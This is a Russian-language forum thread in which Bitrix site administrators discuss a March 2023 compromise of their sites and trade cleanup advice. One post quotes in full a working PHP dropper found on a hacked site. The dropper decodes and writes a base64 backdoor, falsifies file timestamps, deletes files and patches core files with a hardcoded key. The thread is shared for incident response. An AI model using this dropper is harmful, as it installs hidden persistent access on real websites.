Он находится в таблице b_option.
09.03.2023 17:42:06
Он находится в таблице b_option.
|
|
|
|
10.03.2023 09:14:13
Добрый день.
Может где-то писали уже. Вариант внедрений. Папка /bitrix/tools/vote/ создается что-то вроде script-8.php с содержимым <?php @mkdir($_SERVER["DOCUMENT_ROOT"]."/bitrix/tools/vote"); file_put_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/tools/html_editor_action.php", base64_decode("PD8KJHZsID0gJ2tlJy4neSc7CmlmKCRfUE9TVFsnYnh1X2luZm8nXVsncGFja2FnZUluZGV4J109PT0ncEluZGV4MTAxJyYmJF9QT1NUWyR2bF0hPT0nZ2FkZjRlNTdlJyl7CiAgICBkaWUoImhhY2sgYXR0ZW1wdCIpOwp9CnJlcXVpcmVfb25jZSgkX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdLiIvYml0cml4L2FkbWluL2ZpbGVtYW5faHRtbF9lZGl0b3JfYWN0aW9uLnBocCIpOwo/Pg==")); touch($_SERVER["DOCUMENT_ROOT"]."/bitrix/tools/html_editor_action.php",filemtime($_SERVER["DOCUMENT_ROOT"]."/bitrix/index.php")); unlink ($_SERVER["DOCUMENT_ROOT"]."/bitrix/components/bitrix/main.file.input/main.php"); $buf = file_get_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/js/main/core/core.js"); if(strpos($buf, "s=document")>0) { $buf = preg_replace("!(s=document.*?appendChild\(s\));!ism", "", $buf); file_put_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/js/main/core/core.js", $buf); }; $buf = file_get_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog.php"); if(strpos($buf, "echo ")>0) { $buf = preg_replace("!(echo.*?script>\";)!ism", "", $buf); file_put_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog.php", $buf); }; $buf = file_get_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/fileman/classes/general/html_editor.php"); if(strpos($buf, "spell_word")>0) { $buf = preg_replace("!HTTP_S'] == \".*?\"!ism", "HTTP_S'] == \"g308bad51\"", $buf); file_put_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/fileman/classes/general/html_editor.php", $buf); }; echo (240222); unlink ("script-8.php"); |
|
|
|
10.03.2023 09:18:17
Макс Кучин,
это говорит о том, что у Вас не обновлённое ядро с уязвимым модулем vote удалите папки /bitrix/tools/vote/ /bitrix/modules/vote/ и главное - обновитесь |
|
|
|
10.03.2023 13:11:26
Всем привет!
Если у кого осталась проблема с постоянной заменой .htaccess и корневого index.php, то можно попробовать следующее:
Удаляем командой, через ту же консоль:
В общем, после выполнения данных процедур проблем пока замечено не было. Удачи с починкой! |
|||||||||||||||
|
|
10.03.2023 15:09:27
появился файл admin.php |
|||||
|
|
11.03.2023 08:35:45
Коллеги, добрый день
Тоже несколько сайтов клиентов были взломаны. По цепочке логов вроде получилось отследить, что через /bitrix/tools/html_editor_action.php и /bitrix/tools/spread.php Подскажите, если я поставил пароль через .htaccess и .htpasswd на папку /bitrix/tools/, ниче для клиентов не должно сломаться?) Или не рекомендуется так делать? |
|
|
|
11.03.2023 11:19:27
Здравствуйте.. такая же фигня с сайтом.. есть кто может помочь исправить я сам не справлюсь.
|
|
|
|
11.03.2023 11:48:55
Лицензия на Битрикс актуальная? обновления стоят? |
|||
|
|
11.03.2023 14:41:38
2. В html_editor_action.php в начале прописать
|
|||||
|
|
13.03.2023 15:16:14
Так же проверяйте крон. Вот такое на одном из сайтов нашел
|
|
|
|
14.03.2023 11:19:54
Добрый день. У нас так же сломали сайт. Но при всем этом он нормально работал для покупателей, баннер с конституцией появлялся только при попытке зайти по локалке. Пришло время установить сертификаты минцифры и выяснилось, что пароли не подходят, зайти физически на серв не удается. Отдали сервер "сертифицированному партнеру", в итоге уже неделю нет прогресса. Остальные спецы не берутся. Лицензия битрикс актуальна, по обновлениям не могу сказать, так как серв не трогали больше двух лет. Находимся в г. Тюмень. Кто то может решить проблему?
|
|
|
|
14.03.2023 11:33:32
Илья Замяткин, уточните про хостинг сайта - это физический сервер?
расшифруйте "зайти физически на серв не удаётся" - с консоли не пускает под рутовым паролем? какая ОС на сервере? |
|
|
|
14.03.2023 12:20:47
|
|||||||
|
|
14.03.2023 12:45:47
Чрутнуться в систему и сбросить пароль. Дел на 5 минут. |
|||
|
|
14.03.2023 13:07:56
|
|||
|
|
14.03.2023 13:09:44
Илья Замяткин, начните с того из какого Вы города, т.к. в Вашем случае работать удалённо не получится
|
|
|
|
14.03.2023 13:13:08
|
|||
|
|
14.03.2023 13:35:43
Точно, извиняюсь не увидел. Тут я пас, я из Новосибирска. |
|||||
|
|
14.03.2023 13:46:49
Алексей Вдовин, если самостоятельно всё таки рутну серв. То удаленно решить проблему тоже не получится? Условно через какой нибудь zoho? Просто надежда на местных специалистов стремится к нулю
|
|
|
|
14.03.2023 16:10:45
|
|||
|
|
14.03.2023 18:51:32
Ребята привет
Помогите..вот такая беда....как решить?
и таких много |
|||||||||
|
|
14.03.2023 22:51:40
И снова аспро.. у меня кстати тоже с аспро взломали если что
|
|
|
|
15.03.2023 09:15:11
Разницы нет походу. Это дыра именно где то в битриксе, а не решениях |
|||
|
|
15.03.2023 09:16:59
Что имею на сегодня
Два сайта на редакции Старт после обновления пока не ломались сейчас один на стандарте и малом бизнесе пока ловят вирусы, но уже полегче, быстро восстановить можно, но все таки грустно! |
||||
|
|
|||